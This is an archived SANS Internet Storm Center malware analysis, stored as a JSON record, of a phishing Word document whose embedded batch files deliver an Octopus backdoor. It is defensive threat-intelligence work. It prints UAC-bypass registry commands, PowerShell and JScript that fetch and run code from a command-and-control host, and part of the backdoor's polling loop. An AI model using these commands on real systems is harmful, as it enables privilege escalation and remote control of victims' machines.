{
	"id": "301169a5-249e-4057-b801-86c646bf2ad2",
	"created_at": "2026-04-06T00:09:02.125705Z",
	"updated_at": "2026-04-10T03:21:58.698596Z",
	"deleted_at": null,
	"sha1_hash": "f73dfa265e43f1fa1906821654c5228f166c2d49",
	"title": "Malicious Word Document Delivering an Octopus Backdoor",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2783445,
	"plain_text": "Malicious Word Document Delivering an Octopus Backdoor\r\nBy SANS Internet Storm Center\r\nArchived: 2026-04-05 12:40:09 UTC\r\nHere is an interesting malicious Word document that I spotted yesterday. This time, it does not contain a macro but\r\ntwo embedded objects that the victim must \"activate\" (click on one of them) to perform the malicious activities. The\r\ndocument (SHA256:ba6cc16770dc67c1af1a3e103c3fd19a854193e7cd1fecbb11ca11c2c47cdf04) has a VT score of\r\n20/62[1]:\r\nA quick analysis with oledump.py reveals indeed the presence of two embedded objects (the \"0\" indicator):\r\nremnux@remnux:~$ oledump.py ba6cc16770dc67c1af1a3e103c3fd19a854193e7cd1fecbb11ca11c2c47cdf04.doc.vir\r\n 1: 114 '\\x01CompObj'\r\n 2: 280 '\\x05DocumentSummaryInformation'\r\n 3: 416 '\\x05SummaryInformation'\r\nhttps://isc.sans.edu/diary/26918\r\nPage 1 of 5\n\n4: 7338 '1Table'\r\n 5: 4096 'Data'\r\n 6: O 1329 'ObjectPool/_1670067230/\\x01Ole10Native'\r\n 7: 6 'ObjectPool/_1670067230/\\x03ObjInfo'\r\n 8: O 1536 'ObjectPool/_1670067231/\\x01Ole10Native'\r\n 9: 6 'ObjectPool/_1670067231/\\x03ObjInfo'\r\n 10: 4096 'WordDocument'\r\nYou can extract them via oledump.py or directly from the document (if you have a Word in your sandbox). Both\r\nobjects are the same and contain a Windows batch fime. Note the double extension:\r\nHIRING FORM.DOC.bat\r\nCONDITIONS OF THE CONTRACT.PDF.bat\r\nHere is the content (beautified):\r\n@echo Off\r\nfor /f \"tokens=2 delims=,\" %%i in ('wmic os get caption^,version /format:csv') do set os=%%i\r\necho %os%|find \" 10 \"\u003enul\r\n \u0026\u0026 reg add HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command /v \"DelegateExecute\" /f\r\n \u0026\u0026 reg add HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command /d \"cmd.exe /c powershell -WindowStyl\r\n \u0026\u0026 START /W fodhelper.exe\r\n \u0026\u0026 reg delete HKCU\\Software\\Classes\\ms-settings /f||reg.exe add hkcu\\software\\classes\\mscfile\\shell\\o\r\n \u0026\u0026 START /W eventvwr.exe\r\n \u0026\u0026 reg delete HKEY_CURRENT_USER\\Software\\Classes\\mscfile /f\r\nThis script will test the operating system version and if the victim's computer is running Windows 10, two UAC\r\nbypass techniques are attempted:\r\nThe first one targets 'fodhelper.exe' by creating a registry key 'HKCU:\\Software\\Classes\\ms-settings\\shell\\open\\command\\DelegateExecute'. The second one targets 'eventvwr.exe'. This is a common technique\r\nused for a while by attackers.\r\nThe privileged command executes a simple Powershell script that fetches the next stage payload and executes it. This\r\n'sc.bat' is heavily obfuscated:\r\nhttps://isc.sans.edu/diary/26918\r\nPage 2 of 5\n\nThis file contains Chinese characters but interesting strings can be extracted:\r\nremnux@remnux:~$ strings -n 20 sc.bat\r\n=R7cBqDS KFeZWNzhyTrOCGUE3gmujl4@dnxQk0wvbVYIi5aJ8HM1tA2o6L9XfspP\"\r\n%ImJ:~44,1%%ImJ:~41,1%%ImJ:~31,1%%ImJ:~1,1%%ImJ:~7,1%\"\r\n=%ImJ:~54,1%%ImJ:~34,1%%ImJ:~55,1%%ImJ:~40,1%%g\r\n%%ImJ:~43,1%%ImJ:~53,1%%ImJ:~26,1%%ImJ:~3,1%%\r\n%%ImJ:~61,1%%ImJ:~46,1%%ImJ:~31,1%%ImJ:~24,1%%ImJ:~18,1%%ImJ:~41,1%%ImJ:~16,1%%ImJ:~57,1%%ImJ:~20,1%%Im\r\n%%ImJ:~9,1%%ImJ:~50,1%%ImJ:~6,1%%ImJ:~14,1%%ImJ:~44,1%%ImJ:~25,1%%ImJ:~36,1%%ImJ:~59,1%%ImJ:~30,1%%ImJ:\r\n%%ImJ:~15,1%%ImJ:~47,1%%ImJ:~12,1%%ImJ:~45,1%%ImJ:~56,1%%ImJ:~5,1%%ImJ:~1,1%%ImJ:~32,1%%\r\n%%ImJ:~38,1%%ImJ:~10,1%%ImJ:~2,1%%ImJ:~0,1%%ImJ:~29,1%%ImJ:~48,1%%ImJ:~13,1%%ImJ:~28,1%%ImJ:~37,1%%ImJ:\r\n%bIY:~45,1%%bIY:~38,1%%bIY:~57,1%%bIY:~6,1%%bIY:~23,1%\"\r\n%bIY:~35,1%%bIY:~56,1%=%bIY:~43,1%%N\r\n%%bIY:~29,1%%bIY:~12,1%%bIY:~38,1%%bIY:~28,1%%bIY:~49,1%%bIY:~37,1%%bIY:~51,1%%bIY:~33,1%%bIY:~32,1%%\r\n%%bIY:~24,1%%bIY:~46,1%%bIY:~11,1%%bIY:~31,1%%bIY:~63,1%%bIY:~7,1%%bIY:~36,1%%bIY:~40,1%%bIY:~1,1%%bIY:\r\nm%%bIY:~25,1%%bIY:~34,1%%bIY:~45,1%%bIY:~0,1%%bIY:~19,1%%bIY:~39,1%%bIY:~2,1%%bIY:~60,1%%bIY:~30,1%%bIY\r\nF%%bIY:~22,1%%bIY:~53,1%%bIY:~41,1%%bIY:~56,1%%Pc\r\nM%%bIY:~27,1%%bIY:~21,1%%bIY:~23,1%%bIY:~26,1%%_\r\nYW%%bIY:~8,1%%bIY:~6,1%%bIY:~59,1%%bIY:~3,1%%bIY:~17,1%%bIY:~16,1%%bIY:~14,1%%bIY:~9,1%%bIY:~35,1%%bIY:\r\n:~54,1%://hpsj[.]firewall-gateway[.]net:80/hpjs.php');\\\"\"\r\n:~54,1%://hpsj[.]firewall-gateway[.]net:8080/MicrosoftUpdate\"%bK\r\n:~60,1%://is[.]gd/xbQIQ2','C:\\Users\\Public\\Libraries\\pus.bat');\"%bK\r\n:~62,1%:\\Users\\Public\\Libraries\\pus.bat\r\n:~54,1%://hpsj[.]firewall-gateway[.]net:8080/MicrosoftUpdate'%bK\r\n:~62,1%:\\Users\\Public\\Libraries\\pus.bat'%bK\r\nhttps://isc.sans.edu/diary/26918\r\nPage 3 of 5\n\n:~54,1%://hpsj[.]firewall-gateway[.]net:8080/MicrosoftUpdate\r\n:~54,1%://hpsj[.]firewall-gateway[.]net:80/hta\r\nIt downloads more malicious code from URLs present in the file.\r\nThe first one from hxxp://hpsj.firewall-gateway.net/hta:\r\nvar cm=\"powershell -exec bypass -w 1 -c $V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSyste\r\nvar w32ps= GetObject('winmgmts:').Get('Win32_ProcessStartup');\r\nw32ps.SpawnInstance_();\r\nw32ps.ShowWindow=0;\r\nvar rtrnCode=GetObject('winmgmts:').Get('Win32_Process').Create(cm,'c:\\\\',w32ps,null);\r\nThe returned data contains Powershell code that is executed through the 'IEX' command. \r\nThe second script from hxxp://hpsj.firewall-gateway[.]net:8080/MicrosoftUpdate exfiltrates information about the\r\nvictim to the C2:\r\nNow, let's have a look at the Powershell code retrieved above. It's a backdoor that keeps contact with the C2 via\r\nsimple HTTP requests:\r\nwhile($true){\r\n try{\r\n $command_raw = $wc2.downloadString(\"hxxp://hpsj[.]firewall-gateway[.]net:80/view/$IHW\");\r\n }catch{\r\n $failure_counter=$failure_counter +1;\r\n if ($failure_counter -eq 10){\r\n kill $pid\r\n }\r\n }\r\nThe variable \"$IHW\" identifies the victim. The following commands are:\r\nhttps://isc.sans.edu/diary/26918\r\nPage 4 of 5\n\nReport: To return information about the victim (processes, IP address, etc)\r\nDownload: To retrieve a file\r\nreset-ps: To reset the Powershell session \r\nAny other command is interpreted via 'Invoke-Expression'\r\nAll communications occur on top of HTTP but data are AES encrypted. Checking deeper, we are facing an\r\nOctopus[2] backdoor. This framework has been developed to help red teams to compromise and gather information\r\nfrom victims. In this case, it was not an exercise but a real phishing campaign targeting specific users.\r\nI wish you a Merry Christmas and stay safe!\r\n[1]\r\nhttps://www.virustotal.com/gui/file/ba6cc16770dc67c1af1a3e103c3fd19a854193e7cd1fecbb11ca11c2c47cdf04/detection\r\n[2] https://github.com/mhaskar/Octopus\r\nXavier Mertens (@xme)\r\nSenior ISC Handler - Freelance Cyber Security Consultant\r\nPGP Key\r\nSource: https://isc.sans.edu/diary/26918\r\nhttps://isc.sans.edu/diary/26918\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://isc.sans.edu/diary/26918"
	],
	"report_names": [
		"26918"
	],
	"threat_actors": [],
	"ts_created_at": 1775434142,
	"ts_updated_at": 1775791318,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f73dfa265e43f1fa1906821654c5228f166c2d49.pdf",
		"text": "https://archive.orkl.eu/f73dfa265e43f1fa1906821654c5228f166c2d49.txt",
		"img": "https://archive.orkl.eu/f73dfa265e43f1fa1906821654c5228f166c2d49.jpg"
	}
}